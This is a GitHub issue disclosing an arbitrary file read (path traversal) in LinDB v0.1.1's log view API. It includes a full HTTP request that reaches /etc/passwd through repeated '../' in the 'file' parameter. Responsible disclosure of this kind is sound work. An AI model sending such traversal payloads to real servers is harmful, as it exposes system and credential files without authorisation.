[bug]: Vulnerability Arbitrary local file read in log viewer #889
Assignees
Labels
bug
Something isn't working
Comments
3 tasks
|
fixed |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hello, im just find security issue in Log View endpoint, attacker can arbitrary read local files from "file" parameter.
Here is HTTP-Request for reading /etc/passwd :
[code]
GET /api/v1/log/view?file=../../../../../../../../../etc/passwd HTTP/1.1
Host: lindb:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://lindb:9000/console/assets/index.8a526aef.js
[/code]
Here is line from source code:
lindb/internal/monitoring/log_handle.go
Line 126 in 1966dd6
Log viewer must read only files in logfiles directory.
Please Fix this issue and request CVE
LinDB: v0.1.1, BuildDate: 2023-01-18T11:28:06+0900
GOOS="linux"
GOARCH="amd64"
GOVERSION="go1.19.3"
The text was updated successfully, but these errors were encountered: